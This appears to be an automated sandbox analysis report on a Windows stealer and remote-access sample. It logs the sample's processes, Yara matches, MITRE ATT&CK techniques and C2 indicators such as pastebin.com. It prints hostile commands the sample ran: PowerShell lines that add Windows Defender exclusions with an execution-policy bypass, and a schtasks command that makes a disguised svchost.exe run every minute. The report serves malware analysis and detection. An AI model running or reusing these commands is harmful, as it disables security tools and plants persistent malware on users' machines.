                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeQueries volume information: C:\Users\user\Desktop\a9YMw44iQq.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                      Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                      Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                      Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                      Source: C:\ProgramData\svchost.exeQueries volume information: C:\ProgramData\svchost.exe VolumeInformation
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
                      Source: a9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD93000.00000004.00000020.00020000.00000000.sdmp, a9YMw44iQq.exe, 00000000.00000002.3360693057.0000000000672000.00000004.00000020.00020000.00000000.sdmp, a9YMw44iQq.exe, 00000000.00000002.3404316306.000000001B1F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\a9YMw44iQq.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: a9YMw44iQq.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: a9YMw44iQq.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      OS Credential Dumping1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Scheduled Task/Job
                      2
                      Scheduled Task/Job
                      11
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory23
                      System Information Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      21
                      Registry Run Keys / Startup Folder
                      2
                      Scheduled Task/Job
                      111
                      Obfuscated Files or Information
                      Security Account Manager541
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                      Registry Run Keys / Startup Folder
                      2
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets151
                      Virtualization/Sandbox Evasion
                      SSHKeylogging2
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input Capture13
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                      Virtualization/Sandbox Evasion
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570400 Sample: a9YMw44iQq.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 40 pastebin.com 2->40 42 ip-api.com 2->42 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 58 19 other signatures 2->58 8 a9YMw44iQq.exe 15 6 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 3 other processes 2->17 signatures3 56 Connects to a pastebin service (likely for C&C) 40->56 process4 dnsIp5 44 5.166.171.54, 49819, 49876, 49923 ER-TELECOM-ASRU Russian Federation 8->44 46 ip-api.com 208.95.112.1, 49707, 80 TUT-ASUS United States 8->46 48 pastebin.com 172.67.19.24, 443, 49812 CLOUDFLARENETUS United States 8->48 38 C:\ProgramData\svchost.exe, PE32 8->38 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Protects its processes via BreakOnTermination flag 8->64 66 Bypasses PowerShell execution policy 8->66 74 4 